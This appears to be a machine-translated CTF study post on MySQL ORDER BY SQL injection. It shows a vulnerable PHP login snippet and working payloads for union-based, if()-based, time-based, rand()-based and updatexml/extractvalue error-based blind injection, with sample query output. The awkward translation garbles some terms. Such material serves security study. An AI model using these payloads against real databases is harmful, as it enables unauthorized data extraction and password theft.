• • understand order by
  • order by Blind note
    • combination union Blind injection
    • be based on if() Blind note
      • Need to know the column name
      • You don't need to know the column name
    • Time based blind annotation
    • be based on rang() Blind note
  • order by An error injection
    • updatexml
    • extractvalue

In Anheng cup saw the use of order by Blind injection , I remember that I had summed it up before order by Post injection method , Looking through the notes, I found that there was indeed an article titled order by Injected notes , But there is nothing written in it . Read the details , Found to be 17 year 8 month 11 Created by . It's really procrastination and forgetting .

understand order by

order by yes mysql The method of sorting query data in , Examples of use

select * from  Table name  order by  Name ( Or digital ) asc; Ascending ( Default ascending order )
select * from  Table name  order by  Name ( Or digital ) desc; Descending 

The point here is order by After that, you can fill in the name or a number . for instance ： id yes user The column name of the first column of the table , So if you want to base it on id Sort by , There are two ways of writing :

select * from user order by id;
selecr * from user order by 1;

order by Blind note

combination union Blind injection

This was seen at the Anheng cup . Background key code

$sql = 'select * from admin where username='".$username."'';
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if(isset($row)&&row['username']!="admin"){
	$hit="username error!";
}else{
	if ($row['password'] === $password){
		$hit="";
	}else{
		$hit="password error!";
	}
             
}

payload

username=admin' union 1,2,' character string ' order by 3

sql The statement becomes

select * from admin where username='admin' or 1 union select 1,2,binary ' character string ' order by 3;

Here we will compare the third column , Compare the string and password . Then you can make blind annotation according to the different conditions returned by the page . Note that it is best to add binary, because order by The comparison is case insensitive .

Example

mysql> select * from order1;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | uP10AcB |
+------+----------+----------+
mysql> select * from order1 where username='' or 1 union select 1,2,'v' order by 3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | uP10AcB |
| 1 | 2 | v |
+------+----------+----------+


mysql> select * from order1 where username='' or 1 union select 1,2,'a' order by 3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | 2 | a |
| 1 | admin | uP10AcB |
+------+----------+----------+

mysql> select * from order1 where username='' or 1 union select 1,2,'u' order by 3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | 2 | u |
| 1 | admin | uP10AcB |
+------+----------+----------+

there order by 3 Is to sort by the third column , If we union Query string ratio password Small words , We constructed it 1,2,a Will be the first column , When comparing user names in the source code , It will return username error!, If union Query string ratio password Big , Then the correct data will be the first column , Then the page will return password error!.

be based on if() Blind note

Need to know the column name

order by The columns are different , The returned page is also different , So we can make blind notes according to different sorted columns .

Example ：

order by if(1=1,id,username);

It is not possible to use numbers instead of column names , because if Statement returns a character type , It's not an integer .

You don't need to know the column name

payload

order by if( expression ,1,(select id from information_schema.tables))

If the expression is false when ,sql Statements will report ERROR 1242 (21000): Subquery returns more than 1 row Error of , The query content is null , If the expression is true yes , Will return to the normal page .

Time based blind annotation

payload

order by if(1=1,1,sleep(1))

test result

select * from ha order by if(1=1,1,sleep(1)); # Normal time 
select * from ha order by if(1=2,1,sleep(1)); # There is a delay 

During the test, it is found that the delay time is not sleep(1) Medium 1 second , It's greater than 1 second . Finally, it is found that the delay time is a multiple of the number of data queried . Calculation formula ：

 Delay time =sleep(1) The number of seconds * Number of data pieces queried 

What I tested ha There are five pieces of data in the table , So the delay 5 second . If there is a lot of data to query , The delay will be very long . When writing scripts , You can add timeout This parameter is used to avoid the long delay time .

be based on rang() Blind note

I won't repeat the principle , Look directly at the test results

mysql> select * from ha order by rand(true);
+----+------+
| id | name |
+----+------+
|  9 | NULL |
|  6 | NULL |
|  5 | NULL |
|  1 | dss  |
|  0 | dasd |
+----+------+
mysql> select * from ha order by rand(false);
+----+------+
| id | name |
+----+------+
|  1 | dss  |
|  6 | NULL |
|  0 | dasd |
|  5 | NULL |
|  9 | NULL |
+----+------+

You can see when rang() by true and false when , The sorting results are different , So you can use rang() Function for blind injection . example

order by rand(ascii(mid((select database()),1,1))>96)

order by An error injection

I also saw on the Internet order by Error reporting injection after .  Link to the original text

updatexml

select * from ha order by updatexml(1,if(1=1,1,user()),1);# The query is normal 
select * from ha order by updatexml(1,if(1=2,1,user()),1);# Query error 

extractvalue

select * from ha order by extractvalue(1,if(1=1,1,user()));# The query is normal 
select * from ha order by extractvalue(1,if(1=2,1,user()));# Query error